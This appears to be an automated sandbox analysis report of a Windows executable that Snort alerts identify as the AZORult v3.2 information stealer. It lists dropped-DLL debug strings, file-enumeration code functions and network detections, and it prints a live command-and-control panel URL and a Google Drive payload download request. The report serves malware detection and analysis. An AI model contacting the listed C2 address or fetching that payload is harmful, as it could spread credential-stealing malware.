                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nssdbm3.dll.12.dr
                  Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475799639.000000001F998000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471958408.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.472715273.000000001F9A0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477468468.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477869582.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.469680104.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.470488936.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479960511.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.480478688.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.12.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491349501.0000000020324000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.473845022.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491334003.0000000020320000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.12.dr
                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471221878.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471958408.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.12.dr
                  Source: Binary string: vcruntime140.i386.pdb source: 1COK25f1vT.exe, 0000000C.00000003.490976694.000000001F304000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.493685455.000000001F978000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490948392.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, vcruntime140.dll.12.dr
                  Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491708487.000000002037C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.480866812.000000001F998000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491836442.00000000203BC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.12.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nssdbm3.dll.12.dr
                  Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475402246.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.12.dr
                  Source: Binary string: msvcp140.i386.pdbGCTL source: 1COK25f1vT.exe, 0000000C.00000003.485203963.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492268054.000000001F688000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485153671.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, msvcp140.dll.12.dr
                  Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.466563733.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491775740.0000000020398000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491748363.0000000020388000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.469680104.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479481362.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479096628.000000001F990000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.482506212.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482913611.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.12.dr
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0041006C FindFirstFileW,FindFirstFileW,12_2_0041006C
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00414808 FindFirstFileW,12_2_00414808
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00413030 FindFirstFileW,FindNextFileW,FindClose,12_2_00413030
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_004099C0 FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,12_2_004099C0
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0040A9E4 FindFirstFileW,FindNextFileW,12_2_0040A9E4
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0040D988 FindFirstFileW,FindFirstFileW,12_2_0040D988
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_004119AC FindFirstFileW,FindNextFileW,FindClose,12_2_004119AC
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00414A90 FindFirstFileW,FindFirstFileW,12_2_00414A90
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0040FB40 FindFirstFileW,12_2_0040FB40
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,12_2_00412D6C
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00414DE8 FindFirstFileW,FindNextFileW,12_2_00414DE8
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0041160C FindFirstFileW,FindNextFileW,FindClose,12_2_0041160C
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00409EF0 FindFirstFileW,GetFileAttributesW,12_2_00409EF0
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,12_2_00413F58
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0040F7A8 FindFirstFileW,FindNextFileW,12_2_0040F7A8
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00410064 FindFirstFileW,FindFirstFileW,12_2_00410064
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00410068 FindFirstFileW,FindFirstFileW,12_2_00410068
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0040A9E3 FindFirstFileW,FindNextFileW,12_2_0040A9E3
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,12_2_004119A8
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0040DB00 FindFirstFileW,12_2_0040DB00
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0040DB30 FindFirstFileW,12_2_0040DB30
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00412D40 FindFirstFileW,FindNextFileW,FindClose,12_2_00412D40
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00412D48 FindFirstFileW,FindNextFileW,FindClose,12_2_00412D48
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00412D54 FindFirstFileW,FindNextFileW,FindClose,12_2_00412D54
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,12_2_00413F58
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_00409EE8 FindFirstFileW,GetFileAttributesW,12_2_00409EE8
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0040F798 FindFirstFileW,FindNextFileW,12_2_0040F798
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0040F7A0 FindFirstFileW,FindNextFileW,12_2_0040F7A0
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_1_004148A0 __vbaStrCopy,__vbaStrCopy,__vbaStrCopy,__vbaRedim,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,FindFirstFileW,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaFreeStr,__vbaFreeStr,__vbaFreeStr,__vbaAryDestruct,12_1_004148A0
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_1_00414DD0 __vbaChkstk,__vbaOnError,FindFirstFileW,12_1_00414DD0

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49789 -> 185.29.11.112:80
                  Source: TrafficSnort IDS: 2029141 ET TROJAN AZORult v3.2 Server Response M3 185.29.11.112:80 -> 192.168.2.3:49789
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: http://185.29.11.112/rothchildnew/Panel/index.php
                  Source: Joe Sandbox ViewASN Name: DATACLUB-NL DATACLUB-NL
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
